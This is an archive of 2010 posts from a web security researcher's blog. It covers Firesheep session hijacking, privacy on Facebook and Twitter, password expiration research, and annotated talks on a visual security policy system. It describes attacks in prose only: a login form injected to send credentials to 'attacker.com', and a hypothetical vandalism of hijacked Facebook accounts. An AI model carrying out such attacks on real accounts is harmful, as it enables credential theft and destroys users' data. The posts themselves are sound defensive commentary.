Tuesday, December 14, 2010

A brutally honest privacy policy

Dan Tynan has decided to cut through the legalease and confusion inherent in many privacy policies and produced a "real" privacy policy which is open-sourced for anyone to adopt. What results is hilarious and sad at once because it reflects a lot of how "private" data may be used. Here's an excerpt:

"At COMPANY _______ we value your privacy a great deal. Almost as much as we value the ability to take the data you give us and slice, dice, julienne, mash, puree and serve it to our business partners, which may include third-party advertising networks, data brokers, networks of affiliate sites, parent companies, subsidiaries, and other entities, none of which we’ll bother to list here because they can change from week to week and, besides, we know you’re not really paying attention.

We’ll also share all of this information with the government. We’re just suckers for guys with crew cuts carrying subpoenas.

Remember, when you visit our Web site, our Web site is also visiting you. And we’ve brought a dozen or more friends with us, depending on how many ad networks and third-party data services we use. We’re not going to tell which ones, though you could probably figure this out by carefully watching the different URLs that flash across the bottom of your browser as each page loads or when you mouse over various bits. It’s not like you’ve got better things to do.

...

So just to recap: Your information is extremely valuable to us. Our business model would totally collapse without it. No IPO, no stock options; all those 80-hour weeks and bupkis to show for it. So we’ll do our very best to use it in as many potentially profitable ways as we can conjure, over and over, while attempting to convince you there’s nothing to worry about.

Read the rest along with commentary on Dan's blog. He notes that it’s 5,085 words shorter than Facebook’s policy, just for comparison.

Wednesday, November 3, 2010

Security Costs vs Benefits: Should companies deploy SSL to deal with Firesheep?

Yesterday, I talked about why end-users don't care about security and how that actually makes a certain amount of sense for them since the cost of behaving more securely can overwhelm the cost of an actual breach.

However, what I didn't talk about is whether this is true for companies. A single security breach in a single user account maybe doesn't cost a company much, but if breaches get common enough that they start losing users, it could be a problem with a much higher cost.

While users trying to protect themselves from curious folk with firesheep are counseled to use a VPN, website owners can choose to do encryption right from their end using SSL. But it was thought that SSL was computationally costly and even environmentally costly due to the supposed need for extra electricity and machines.

But who's been looking at what those costs actually are? A blog post entitled Overclocking SSL looked at the severity of these costs as they deployed SSL, and made a pretty clear statement:

If there's one point that we want to communicate to the world, it's that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it's just not the case any more. You too can afford to enable HTTPS for your users.

So there you have it: the people who should be protecting users from firesheep attacks are probably the companies who run the websites, since SSL isn't likely to be as costly to them as numerous complaints and support requests would be from their users. The cost equation might not be the same for all organizations, since the cost of certificates and labour can be non-trivial if you don't already have expertise on hand. But sure enough, Google has decided to provide https access by default to all gmail users, so they clearly believe it's worth it.

This leads to an interesting question: Does the burden of security always fall heavily on corporations and large organizations rather than on end-users? Many would argue that this is naive and that users must bear some responsibility, others would argue that only corporations have the resources necessary to make an impact on security. This is a much larger discussion that I expect we'll see occurring over and over again for a very long time.

Tuesday, November 2, 2010

Apathy or sensible risk evaluation: why don't people care about security?

Engineer Gary LosHuertos decided to try Herding Firesheep in New York City: He sat down in a Starbucks, opened up his laptop and started gathering profiles, then sent messages to people whose facebook accounts he could access warning them of the security flaws. Some people closed up and left, but some just ignored his message and went on with their day. Confused, he sent another message, but they just didn't seem to care and continued using their accounts.

This is the most shocking thing about Internet security: not that we are all on a worldwide system held together with duct tape that has appalling security vulnerabilities; not that a freely available tool could collect authentication cookies; and certainly not that there are people unaware of either. What's absolutely incomprehensible is that after someone has been alerted to the danger (from their own account!) that they would casually ignore the warning, and continue about their day.

But is this shocking? To someone who cares about security, maybe. To someone who knows people? Less so.

Cormac Herley has an absolutely great paper entitled "So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users"

It is often suggested that users are hopelessly lazy and unmotivated on security questions. They chose weak passwords, ignore security warnings, and are oblivious to certificates errors. We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort.

So let's think a little bit about cookies and firesheep. One of the ways to be most safe is to browse using a VPN. For someone who already has one set up, this is pretty much a matter of toggling something on your computer: pretty low difficulty and less trouble than having your accounts hacked. You can see why many geeks think it's ridiculous that people wouldn't just secure their sites: even if you include time setting up the VPN, for many folk that's a task that falls under the heading of "something I meant to do anyhow" and isn't really perceived as costly.

But if you're not a computer-savvy person who has a server online to host a VPN, setting up a VPN can be stupidly costly. Maybe you'd have to replace your router with one that can handle it. Maybe you'd have to pay for hosting. Maybe you'd have to spend hours figuring out how to generate keys, or pay someone else to do that. Maybe just figuring out what you need to do at all is going to take hours. Quickly, the hours required seem worth more than the cost of having some stranger send you messages from your own facebook account, or maybe set your status message to something embarrassing.

Perhaps what we need to raise the costs of a security mishap is a little evil. It's actually easy to craft a firesheep-based attack that would raise the cost high enough to make VPN hunting (or just not using the Starbucks wireless) seem worthwhile to most people: Log into someone's account, delete all their status messages, notes and photos, defriend all their friends. Since there's no easy way to back up your facebook profile, the results would be devastating and partially unrecoverable: worth more than the pain of setting up a VPN or going without FB while in a coffee shop. It might be easier to litigate for theft/unauthorized access than it is to restore that profile, so I don't recommend any security vigilantes start doing this!

So I guess the take-home message here is that while it's worth trying to educate users so they can make smarter decisions, they're not necessarily being delusional or foolish when they just say "meh" and go on with their lives. If we want to make a really huge impact, we need security solutions that are so low-pain that there's no longer any rational reason to reject them.

Friday, October 29, 2010

Apparently Facebook hates privacy so much that they pay lobbyists to stop privacy laws

This maybe shouldn't surprise anyone, but Mashable is reporting that Facebook Lobbied to Kill Social Networking Privacy Act in the USA.

It's one thing to believe that privacy isn't important, or to make mistakes that expose users, but paying people to lobby against privacy legislation that might protect your users seems like a big step further. It makes me concerned as a user of the service.

Incidentally, Facebook has already broken Canadian privacy law (they're not the only ones), and likely the laws of several other countries, so I guess it makes sense that they wouldn't want to run afoul of further laws... but I really wish they'd do this by handling privacy issues better rather than paying people to make sure the laws don't come into effect. Maybe the law was simply ill-conceived (I haven't read it) but this really doesn't sound like the actions of a socially-responsible company. Very disappointing.

Thursday, October 28, 2010

Why 12 year olds may be our best bug hunters

You may have heard the news: Mozilla pays 12-year-old San Jose boy for hunting bugs in system:

It's safe to say a typical Willow Glen 12-year-old doesn't earn $3,000 for a couple of weeks' worth of work. Then again, Alex Miller is no typical 12-year-old.

Alex is a bug hunter, but the bugs he's uncovering are unlikely to end up in any entomological reference book. Instead, the bug Alex found was a valid critical security flaw buried in the Firefox web browser. For his discovery, he was rewarded a bug bounty of $3,000 by Mozilla, the parent company of Firefox.

Much of the coverage I've seen has been along the lines of "wow, if a 12 year old can find a bug, then anyone can do this!" which I think is awesome if it has more people out looking through code in hopes of one of those $3k bounties. But I also find that attitude a little sad because frankly, Alex Miller sounds like a pretty smart guy and implying that what he did is easy because he's young is a bit condescending and likely incorrect.

But the more I think about it, the more I think that maybe younger bughunters have some natural advantages, and maybe we should go out of our way to recruit them. I taught 17 year olds doing in-lab tutorials for several years running, and work students down to around 12 years old when I've taught mini-courses in the spring, and they're pretty darned sharp.

Here's some assets younger folk bring to the table when it comes to security flaws:

  • A different point of view -- Some teachers take it as incredibly frustrating that their students just don't see the world the way they do because it can be hard to teach without common ground, but I've always found it fascinating how my students will write code in ways completely different to what I expect. Frankly, I don't see this kind of diversity when I work with my colleagues, probably because we have similar educational backgrounds. A different way to think can help you find things that others are going to miss, in research or in security bug hunting!

  • Time -- Alex Miller says he only spend 90 minutes/day for around 10 days to find his bug, but in general tweens and teens can have a lot more free time than their adult counterparts. Sure, there's school and homework and often a slew of extra-curriculars, but there's usually less time spent on childcare, laundry, groceries, cooking, cleaning, yardwork. Younger students may do some of that, but usually not all of the above.

  • Enthusiasm -- Let's face it; if you stare at code all day at work, you're not always likely to set aside 90 minutes/day to do it at home. Whereas when I was a teenager and was writing essays at school, 90 minutes of debugging sounded like a lot more fun!

  • Chutzpah -- It's easy for us as adults to think "meh, so many people have looked at this... I'll never find anything" and in general the students I work with have a lot more guts and are just more willing to believe that they personally will change the world if they just try. Certainly, my gaming students often propose genre-busting epic game ideas that I can just imagine getting shot down at a company meeting.

So maybe we shouldn't be saying "if a 12 year old can do it, anyone can" and instead thinking "how can I channel my inner 12 year old?"

Wednesday, October 27, 2010

Quick Hit: Firesheep

By now, probably everyone's already heard of firesheep, the nice user-friendly way to use cookies to do session hijacking. Want to be logged in as someone else on Facebook? No problem.

It's nothing spectacular on a technical level, since it's been easy enough to use other people's cookies for quite some time, but it's a pretty impressive social hacking tool. It's making it clear to a lot of people (and media) that this is a real problem, and that it's an exploit anyone can do now.

I'm actually sort of surprised that I haven't seen this earlier: it used to be a bit of a game in the undergrad lounge to see what one could sniff off the network, with people using some tool whose name I've forgotten to show any images that came up from users surfing on the wireless. Hacking session cookies would have been a fun addition to our childish games -- and I'll bet plenty of college kids are using it for just that. Or for checking out their ex-boyfriends/girlfriends...

Monday, October 11, 2010

Does expiring passwords really help security?


Change is Easy
Originally uploaded by dawn_perry
I've heard a lot of arguments as to why expiring passwords likely won't help. Here's a few:

  • It's easy to install malware on a machine, so the new password will be sniffed just like the old.
  • It costs more: frequent password changes result in more forgotten passwords and support desk calls.
  • It irritates users, who will then feel less motivated to implement to other security measures.
  • Constantly forcing people to think of new, memorable passwords leads to cognitive shortcuts like password-Sep, password-Oct, password-Nov...
And yet, many organizations continue to force regular password changes in order to improve security. But what if that's not what's really happening? Three researchers from the University of North Carolina at Chapel Hill have unveiled what they claim to be the first large-scale study on password expiration, and they found it wanting.

They focus especially on the idea that consecutive passwords will be related, and build a system which could try a variety of transforms such as changing which letter was uppercase, duplicating letters/numbers/symbols, and even "leet" translation (eg: raven becomes r@v3n). The implications of their results are fairly clear and potentially disturbing for those who thought password changing was providing extra security in the case of a breach:

  • With offline attacks: "On average, roughly 41% of passwords can be broken from an old password in under 3 seconds."
  • With online attacks: "An average of 13% of accounts can be broken (with cer- tainty) in 5 online guesses, and 18% can be broken in 10 guesses."
  • "As we expand our consideration to other types of transform trees, we would not be surprised to see these success rates jump significantly."
In essence, they've shown that changing passwords doesn't provide nearly as much security as system designers had hoped, and they suggest we abandon the practice rather than continue to annoy users with a policy that has been proven ineffective.

Monday, September 20, 2010

Privacy and Twitter lists

privacyI think twitter may have among the simplest privacy settings of any social network. Your choices are either everything you post is public, or everything you post is private.

But simple does not mean that things will stay private. Just like everything on the internet, the minute you post something someone else might choose to share it. Some researchers have actually studied how often people retweet private content on Twitter.

Something I haven't seen studied, however, is how private information can leak out through twitter lists.

Twitter allows you to make lists of people who you'd like to have grouped together. For example, I have a list of technical women who I follow. These are women in technology who I've met in person or interacted with extensively online, and I really made it for my own personal use but since it's a public list others can (and do) follow it. Presumably they're looking for more cool women to expand their social networks.

Twitter allows you to see what lists a person has been added to, and this is where it gets interesting. Let's take a look at the lists of which I am a member and see what we can learn about me.

Here's a few things you can get a glance:


Wait... what? Despite the fact that I explicitly chose to say a more generic "Canada" in my profile information, my current city can be determined by the fact that it shows up in several of the lists I'm on. There's of course no way to be sure that any of this is true, but when more than one person lists me as being in Ottawa it seems fairly reasonable to guess.

I'm not personally concerned (obviously, since I'm talking about all this information in a public blog post!) but some folk are much more private than I am.

So what are your options if you want to hide this information? Well, if I don't like the lists I'm on, I can... uh... There's no apparent way to leave a twitter list. I suspect one could block the list curator, but the people revealing your location are most likely to be actual real life friends: people you wouldn't want to block. So you'd have to resort to asking nicely, but that's assuming you even notice: while you can get notifications of new followers, you do not get notified when you're added to a list. I've been asked about exactly two of the lists I've been put on (thanks @ghc!) so obviously it's not the social norm to ask (I certainly have never asked anyone I've listed!)

A quick check says I can usually get the current (and sometimes some former) cities for many of my friends, as well as information related to their occupations, interests, and events they've attended. For most of these people, I know this isn't information they consider private either. But it's obviously possible that this could be a problem... I wonder how many people it affects in a negative way?

Maybe this is a potential little workshop paper if I have time to analyse a whole bunch of twitter lists. Anyone want to lend me a student who's interested in social media privacy?

Edit: A note for those concerned about not being that privacy-violating friend. You can make twitter lists private if you want (it's just not the default), so just do that for the lists you think are sensitive and you're good to go!

Monday, August 23, 2010

Visual Security Policy for the Web

This is the annotated version of a presentation I gave at the 5th USENIX Workshop on Hot Topics in Security (HotSec '10). My slides tend to be designed to complement what I'm saying rather than as stand-alone pieces, so I'm writing out approximately what I said during my presentation so that you can get the whole sense of the presentation. I also make heavy use of creative commons content to put together my presentations: click through each image for attributions and more details about the photos used.

Visual Security Policy for the Web

83% of web sites have had a serious vulnerability

According to WhiteHat Security, 83% of web sites they looked at had a serious vulnerability at some point in their lifetimes.

64% of all sites have a security flaw right now

They found that nearly two thirds of all websites had such a vulnerability right now.

So really, we should be asking ourselves... why?

What makes the web so hard to secure?


What makes the web so difficult to secure?

Unfortunately, that's not an easy question to answer. If you asked 20 web security experts, you might get 20 different answers...

Some potential reasons the web is so insecure

From technologies to attackers to standards... there's a lot of little things that can go wrong and result in an insecure web page.

I don't have time to talk about all of them and I certainly don't know how to solve all of them, so I'm going to focus on one particular issue...

There are no restrictions within a web page

And that's that there are no restrictions within a web page.

Sandbox

So in the typical way of describing things, your browser makes a sandbox for your web page to play in.

Kid in sandbox

So you put your cute little baby web page in there, and things are pretty good. But eventually, you get bored...

Kid in sandbox with toys

And you want to add some toys in. User comments, latest status updates, advertisements, pictures. There's a lot of toys available for your web page. And that's great...

Kitten in "sandbox"

... if your web page is filled with nothing but cute and cuddly things that like to play together. But even cute and cuddly things have accidents...

Shark in the sandbox

And not every bit of stuff that gets added to a web page is necessarily safe. It's quite easy to wind up with sharks in your sandbox.

Separation between components can mitigate attacks

We've actually got some great web security work out for mashups that deals with separation, so you can put all those potential sharks into separate tanks and keep other content safe.

Aquarium with separate tanks for different "content"

So your web page becomes a bit more like an aquarium with lots of separate boxes or containers or fish tanks.

But not many web developers use encapsulation

But even though we have known ways to add separation, web developers don't use it. And then you wind up with sharks pretty much everywhere...

(This actually isn't photoshopped; it's a real art installation.)

Megashark

And if you're worried about sharks running in to houses, you should be especially worried about the menace that is MegaShark. If you've watched the trailers, you know that MegaShark is a giant shark capable of jumping out of the ocean into the air and taking out an airplane.

[pause]

But no, I'm not here to talk about MegaShark.


Infographics make complex data easier to understand using visuals

What I want you to see is that the picture I have up here is an infographic. That's a graphical way to represent data, usually statistics, used by magazines and other who want to convey complex data in a way that people can readily understand it.

So here you can see visually how much bigger MegaShark is than a great white or even a meglodon. The infographic shows you how fast MegaShark would have to be going, reminds you that a shark travelling that quickly would damage other nearby boats, and so on.

Equations allow more detailed analysis... if you understand them.

It's not the only way to represent the information. One could also use the equations that were used to calculate the speed of the shark. This lets you get a lot more detailed information, like the density of the water in the San Francisco Bay.

But you can only glean that information if you understand the equations. I have a math degree, and I can tell you that I certainly can't get that information at a glance: you need to know the symbols used, the physics, etc. It may provide great detailed information to experts, but for many people it will be impenetrable, and even for experts it's going to take a lot more time to analyze.

Infographics vs Equations: both have strengths and weaknesses

So that's two ways to represent information, one which is very good for quick explanation and memorable presentation, another which provides greater detail and precision.

But what does this have to do with web pages?

The people who make web pages... are also the people who make infographics

Well, the thing you should note is that the people who make web pages are often the same sort of people who make infographics. They're graphic designers, often with artistic backgrounds, and they like to work within the visual space, often to reach a wide audience.

Visual Security Policy

And that's the sort of thinking that inspired my work on visual security policy. Existing work allows extensive customization of policy, but it didn't really give a higher level, at-a-glance sort of way to deal with web page security.

Math is hard; let's draw boxes!

Or to put it more flippantly... Math is hard, let's draw boxes.

Drupal support forum

So here's an example. Let's say you're running a site with forums. This is the support forum for Drupal, a content management system. People post their questions, and other people can help them out with answers.

A possible attack

But what if one of those people answering wasn't interested in being helpful so much as gaining control over other users? Suppose this person was able to inject a little bit of code (I don't know of any vulnerabilities on Drupal right now, but and remember, with over 80% of sites vulnerable at some point in their lifetimes, it may just be a matter of waiting for many sites).

So here, let's suppose poster #2 has injected some code that changes the login box so that it sends usernames and passwords out to attacker.com.

Login form redirection attack code


That's about two lines of code, so it's easy enough to disguise and hide in a lengthy comment.


Visual Security Policy boxes on Drupal

If we wanted to stop this using boxes, we'd probably take a look at the page and think “well, that's user-inserted content there and there... there could be sharks!” so you could put a box around each comment separately. And then we might realize that login box contains the username and password, so we should probably protect it too. Into a box it goes! That way if we missed a source of user content, it's still protected.

How ViSP stops the attack

So if poster #2 goes and tries to attack the page, they get stopped in their own box, and they cannot change the login box, so nothing gets sent out to attacker.com.

Visual Security Policy (ViSP)

Visual Security Policy (or ViSP for short) has 4 components. The first as we saw in the example is a box: it's a visual area on screen that has an associate security policy.

The second is a channel, which allows communication between boxes. This can be one-way.

Then there's the multibox, which is a bit different in that it's more of a shortcut. There are many cases where there are a whole bunch of similar things on a page: lists of status updates, news stories, comments, etc. We might want to give them all similar security properties, and the multibox lets us do that. Also sometimes the “next” button may add things into the page instead of loading a new one, so the multibox makes sure you don't have to care if there's 5 things or 20 – they'll still be boxed up.

Finally there's structure which is the... invisible part of visual security policy. It lets you group things into columns, etc. even if the column itself shouldn't have any special security policy.

ViSP for Drupal

So here's what the ViSP would look like for our Drupal example. It's short xml, and you'll note that the id attribute can be used to show how ViSP can be associated with the underlying HTML.

But this is a relatively small example. What would ViSP look like on a larger site?

A more complex example: Facebook

So let's look at Facebook. At ¼ of the page views in the US, you pretty much have to be able to handle Facebook if you want to claim you have a system that can do web security. While you might have to whitelist facebook itself, the elements of it will show up on other sites because that's what people expect.

And some of those are high-risk elements: user-generated content, advertiers, apps, and people who sometimes don't realise the risks they're taking. And of course, it's a fairly complex layout which could be an issue for a visual solution.

Old Facebook home page

So here's what Facebook looked like a little while ago. They've since redesigned by many of the elements are still there, like the menu bars.

A sample ViSP policy on the Facebook home page

And here's what a visual security policy for Facebook might look like. I've protected menu bars on the top and bottom because attackers might modify those to facilitate phishing attacks. There's my chat on the right and an advertisement on the far right, and then there's a big multibox with all my friends' status updates in there. I might trust my friends, but you never know when someone might get their account compromised or hit with a virus or something, so we want to separate those out.

ViSP for Facebook homepage (XML version)

And here's what that fairly visually busy policy looks like in XML. Not too bad, really.

Facebook Code

... Especially when you compare it to the actual code for facebook. This is some of the code used to generate the page I showed you (you can see my name in there). It's complex JavaScript, and it can be surprisingly difficult to figure out where a box should begin and end in all that mess. And that's not a critique of Facebook specifically: many web sites are generated from a variety of server and client-side systems. Writing policy for generated HTML can be very complex, and that could be one of the reasons so few web developers have embraced security policy.

Policy Creation Tool Prototype

The real question at this point is “does it work?” and I can tell you that I do indeed have a working prototype. You put it into policy creation mode through the menu or a keystroke, mouse over the page, and click to draw the boxes. Right now, it only handles boxes: you have to write in channels and multiboxes by hand.

But what about channels?

Now, you may be asking... what about the properties of channels? How do they work? And the answer is “I wish I could tell you.”

Channels are a staple of the existing work in mashups, with the idea that you'd want to set up a page so changing, say, your city could also update news, weather, etc. In other parts of the page. But within my test set, I was surprised to find very little use of this sort of inter-page communication. I don't know if this is an artifact of the pages we chose, or if there simply isn't much communication going in within the page. Perhaps most communication comes from attackers? I really don't know the answers.

Issues and Future Work

So here's some of the issues we found and some things I'd like to do. The big issue with ViSP is that it can only handle visual parts of the page, so if you've got JavaScript in your header, there's no way to encapsulate that. We found that in many cases, JavaScript was included where it was used, so you'd have menu code and the menu right together where the menu is displayed in the page instead of in the headers. But that may not always be the case.

It's unclear how that's going to work, just like it's unclear about how channels will work.

Several people, including one of my anonymous reviewers rightly suggested that ViSP might be even easier if it could be deployed not as separate XML but instead as a “security stylesheet” in CSS. So we're working on that. We're also putting together a user study for the fall so we can answer the question of whether it really is more usable. And of course, there are more tests to be had against other websites and real world attacks.

Open Questions

Since this is HotSec, here's a few questions to get the discussion started:
- Is ViSP really more usable? I've gotten really positive responses in my informal discussions with web folk, but it's still an open question.
- How much communication goes on within the page? Was that a fluke of our test set or have we learned something about normal web behaviours?
And finally
- What technologies should ViSP play well with to provide a complete solution?
This is only one piece of the web security puzzle that deals with one part of the web security problem – how does it need to interact with others to provide a complete solution?

Thanks for listening!

Want to know more? You can read the whole paper "Visual Security Policy for the Web" at the following locations:
You can also comment here or contact me at terri (at) zone12.com if you have any questions or ideas you'd like to discuss.

Thursday, August 19, 2010

Privacy: Not just for people who are doing bad things

I'm happy to see that Gizmodo is already recommending that people disable Facebook Places in as much as you really can.  And the article has a nice step-by-step on how to limit the amount your friends can (accidentally or intentionally) violate your privacy.

But I take issue with the fact that their examples were "you're lying to your girlfriend" and "you're cheating on your wife."  Seriously?  I know they were trying to be funny, but the implication you get from the article is that privacy should only matter in this way if you've got something to hide.  But that's not the case:

What about a parent who doesn't want to advertise to strangers the exact geo-location of the parks his kids play in every day?

What about a woman who has received threats from unpleasant people who feel that women should not be involved in open source software?  (I wish I were kidding, but this happened to me, and other people receive threats from disturbed individuals online.)

What about someone shopping for an engagement ring who meets a friend at the mall?

There's plenty of reasons one might prefer privacy.   I think maybe we would do well to include this sort of example in articles, so that even those living utterly honest lives will realize that privacy is important to them and people they care about.

Friday, July 9, 2010

Preparing some curricula on web security

Among the other cool things I'm doing this summer is working as a teaching assistant for 1.5 days worth of tutorials on the subject of web security. This is part of my national research group's "summer school" program where we try to give our graduate students more background into other areas of security. I'm working up a list of potential topics so we can get our teaching materials together.

So... What would you want to learn in a short course on web security? What do you wish other people knew about web security?

Here's my brainstorming list, to be updated as new things occur to me:

Attacks

Defenses

  • Best coding practices
  • Web Application Firewalls
  • Web Vulnerability Scanners
  • Tainting
  • Mashup solutions (e.g. MashupOS, OMash)
  • Policies (e.g. SOMA, BEEP, CSP)
  • Penetration testing techniques

Notes: The tentative plan is to separate things into a hands-on lab tutorial (probably using webgoat) and a set of lectures, mostly running simultaneously. We're going to have some top-notch students here, since we're drawing from a pool of smart security researchers to start, so we can cover a lot of ground and go much further in depth than we might teaching developers with no security background.

Tuesday, June 29, 2010

A crash course in the social media equivalent of defensive driving

How can you stay safe and keep things private while still taking part in online life? I'm a web security researcher, so I get asked this fairly frequently.  And it's easy to see how people get overwhelmed by all the news stories, the marketing blurbs, and the constantly changing policies.

Why I'm not telling you to quit Facebook

Let's say you're worried about your risk of getting into a car accident.  Do you sell your car and refuse to get into any moving vehicle?  No.  Refusing to use a car might make you safer, but it would be quite isolating and, depending on where and how you live, very difficult.  Just like many people live without cars, you can live without social networking, but it there are some significant costs to refusing to participate.  Many people's need or desire to participate is much stronger that the risks they face.

If you're worried about car accidents, you've got other options to manage your risks than giving up your car.  You can learn to drive defensively.  You can make sure you wear your seatbelt.  You can learn about the safety ratings and use cars that perform better in safety tests.  You can refuse to drive places that are dangerous.

So what I'm hoping to do here is give you a crash course in the social media equivalent of defensive driving.

The web is not a safe place

When I learned to drive, my driving instructor often reminded me that I had to treat every car on the road as if it were being driven by a moron who might swerve into my lane at any time.   It might seem like a very negative point of view, but it's a very practical one that's helped me avoid accidents on numerous occasions simply because I was expecting it.

My blog is called Web Insecurity for a reason.  Nearly 2/3 of web pages currently have a serious vulnerability.  So that means no matter what the policy is, how careful you are, or how careful your friends are... there's a good chance you are going to view some code controlled by a bad guy, and they could get information about you that you don't want them to have.  It's often very easy to exploit these vulnerable parts of a website.  75% of websites with malicious code are legitimate sites.   

You may be thinking, "sure, but no one's going to care about my data."  And you may be right.  But if a bad guy is trying to make a company look terrible, one way to do so is to expose information about all of their users.  You can definitely wind up as collateral damage.

Learn your legal protections

Learning about legal stuff can be time-consuming and confusing, and frankly companies may violate laws anyhow.  But it's still worth learning a bit about your rights. The EFF has quite an impressive body of work covering free speech, privacy, intellectual property and other important issues, and they do a great job of translating legal speak into clear, comprehensible articles.   You might also consider reading bloggers like Michael Geist, and your country may have great resources like the Office of the Privacy Commissioner of Canada.

Remember that things that may seem similar often have very different legal protections.  For example, if my credit card number is stolen, there are laws that limit my liability to $50.   But that's not true about all money transactions online:  Debit/bank cards have no such legal protection.  Some modern credit cards that require a PIN have no such protection even though these cards aren't actually safe. You may have no legal protection from your bank if you don't follow their security procedure to the letter, and those security requirements of online banks can be pretty crazy: Do you reboot your computer every time you bank?  No?  You might be on the hook if someone compromises your account!

So yeah.  It's a bit of work, but it's worth it to at least learn about the issues that affect you.

Learn the controls

It may seem a bit silly, given that I've already told you that websites can easily be compromised, but if you're managing risks you should learn to use your privacy controls, choose good passwords and security questions, and keep those things private.  Again, it's about managing your risks: even if these controls can't make you 100% safe, they might make you safer.


Companies are not your friends

For many companies online, you are not really their primary customer: your time and your personal information are assets the company sells to their advertisers.  You have to expect to be treated accordingly. You have to treat every company or organization you interact with online as potential hazards.   Many companies intentionally or unintentionally violate privacy laws and even violate their own privacy rules.  And privacy rules change, sometimes because the company itself changed them, sometimes because they get bought out by another company.  Your guarantee when you signed up for the site is unlikely to hold a year from now, but it may be nigh impossible to remove your data from the system when it changes.

And that's just the "legitimate" problems that could affect you: there's a good chance any company's sites could be attacked and your data exposed as a result -- it happens to fully legitimate companies all the time, no matter how good their intentions towards you and your data.

Choose your friends wisely

You wouldn't tell all your secrets to the office gossip, but online your friends may be "forced" to become gossips either through malicious software or through changing policies.  It sounds like some crazy super-spy movie: trust no one!  Your friends could be compromised!  But once again, just like I'm not telling you to delete your facebook account, I'm not going to tell you not to share, just to be defensive.

For example, I have a couple of friends who really enjoy Facebook games.  They seem to install every new thing that comes along and invite me to join.  Nothing wrong with that, right?  I mean, if I don't want to join, I just don't, and that's the end of it.  Except that it's not: my friends have all these games and thus all these extra ways that someone might break in to their accounts.  And indeed, these are the folk who wind up with compromised accounts more often than most.   So while these are great people who I'd be happy to share job concerns or relationship woes with in real life... It's too risky for me to share private stuff with them online.  They are the office gossips, whether they mean to be or not.  They're not the only ones who put me at risk (any friend can end up on the wrong end of a broken website) but they're the riskiest.


Choose what you want to share

The biggest part of managing your risk is choosing what you want to share online.  Here's a few questions you might want to ask yourself:
  1. Will this embarrass me if it gets out?
  2. Will this affect my safety?
  3. Will this affect my employment?
  4. Will this affect my family/friends?
If your job requires you to be a role model, you may have to be a role model even in your off-hours. Maybe it shouldn't be that way, but let's be pragmatic: you have to assume that it is that way.  

You have to assume that anything you share online could become public knowledge.  You can't trust the companies, you can't assume their sites are safe, and you can't even trust your friends because of unsafe websites.  

Think before you share.



Using a pen name

One other way to manage risk is to use a pen name or pseudonym.  Lots of people do this to give them a layer of privacy, especially when trying out something new like starting a silly blog, or when engaging in discussion that could be sensitive such as online political debate.  Sometimes it's even an open secret that so-and-so goes by a nickname online, and the only reason they do is to make it harder for potential employers to come up with a list of everything they do online when searching their legal name and given email address.

This is a great tool if you want some more freedom to speak, but people sometimes will do the legwork necessary to figure out who you are, especially if you're high-profile or saying something unpopular.  So pen names are great, but do remember that they're not 100% guaranteed to keep you safe.  Again, it's another way to manage risks.

No matter what you do, everything may become public

I've said this a bunch of different ways, but this is the real take-home message here: No matter how careful you are, anything you do online can become public knowledge.   It's up to you to manage your risks accordingly.

But don't despair -- it may sound stupidly hard, but you're already handling issues of trust and privacy every time you choose to tell a story to a friend or complain about work at a party.  You might have to pretend you're in a spy movie and trust no one, or you might decide some things are perfectly fine to share with the world.  Just try to make an informed decision.

Friday, May 21, 2010

No Website Left Behind: Are We Making Web Security Only For The Elite?

This is an annotated version of my presentation at W2SP 2010, since I realized my slides by themselves are missing a lot of the story. The full paper is available from the conference website and I should be putting up an HTML version shortly.

w2sp: Slide 0: No Web Site Left Behind: Are we making web security only for the elite?

Hi, I'm Terri, and I'm here to talk about whether we're excluding some very important people when it comes to web security.

The first thing you need to know is that...

w2sp: Slide 1: Page Creators are not all Programmers

And of course you knew that, because we all know the Internet is actually run by cats.

w2sp: Slide 2: The Internet is run by cats

... and we all know that cats aren't programmers; they're artists.

w2sp: Slide 3: Cats are artists

Seriously, though, many of the people who do web design professionally are artists, not programmers. You can see this through the job titles used and other services offered by many web design firms.

w2sp: Slide 4: Professional web page creators often have artistic backgrounds

And then there's all the people who make pages but aren't professionals. Cat blogs, community sports team sites, small church websites, etc. are often made by non-professionals.

w2sp: Slide 5: And there are plenty of non-professional page creators too!

And in many ways, it's fantastic that all these people can make web pages. Web 2.0! Sharing! Communication! But the problem is that web security is designed for programmers.

w2sp: Slide 6: Web Security is for Programmers

So, for the purposes of visualization, let's pretend that a web page is like a car...

w2sp: Slide 7: Suppose a web site is like a car...

Thus we can imagine web security issues like cross-site scripting and cross-site request forgery are sort of like getting gremlins in your engine.

w2sp: Slide 8: Problem: Gremlins in the engine

With this analogy in mind, let's look at some of the best tools we have for fixing websites:

w2sp: Slide 9: Safer Coding Practices

The big one is safer programming practices. You take your existing website, and replace it with a new, gremlin-proof one. This is pretty programming-intensive, much like you'd need some serious mechanic skills to replace your entire car engine.

Then there's tainting or data flow analysis, which allows you to trace the path of the gremlins through your engine...

w2sp: Slide 10: Tainting

But once you've done that, you still have to patch the code so that the gremlins can't cause problems. Programming!

w2sp: Slide 11: Tainting (Fix The Code)

We've got known exploit detection, such as web application vulnerability scanners and web application firewalls. They tell you exactly where and what kind of gremlins you have.

w2sp: Slide 12: Known Exploit Detection

But while they might protect you for a time, best practice still says you should fix your code.

w2sp: Slide 13: Known Exploit Detection (Fix The Code)

And then there's the cool mashup protections which help you fix your code to provide isolation between components so that the gremlins can't breed in your engine. But they mostly involve a lot of coding to implement.

w2sp: Slide 14: Mashup Protections

Even the language of security is heavily oriented towards programmers. The documentation for Mozilla CSP even includes set theory notation! Not exactly friendly for artists.

w2sp: Slide 15: The Language of Security

Some of the organizations that do the best job of communicating (web) security flaws tend to be intimidating to non-programmers, and really send the message “If you're not a programmer, this isn't for you.” This is not the message we want to send!

w2sp: Slide 16: Non-Programmers still need Security

Because non-programmers really do need security.

w2sp: Slide 17: The Web is a Target

The web is a big target, and attackers aren't limiting themselves to big sites – automated attacks make it worthwhile to compromise even smaller targets. Lots of attackers are interested in sending spam, SEO, evading blacklists, etc. all of which can utilize smaller sites. And the attacks aren't always where you'd expect: Did you know your Facebook account is currently worth more on the black market than your credit card?

w2sp: Slide 18: Design choices affect security

But if you're thinking “So, we just let the designers design and handle security at the programming layer below,” you're missing two important points:

First, smaller sites may not have anyone who can handle security, period.

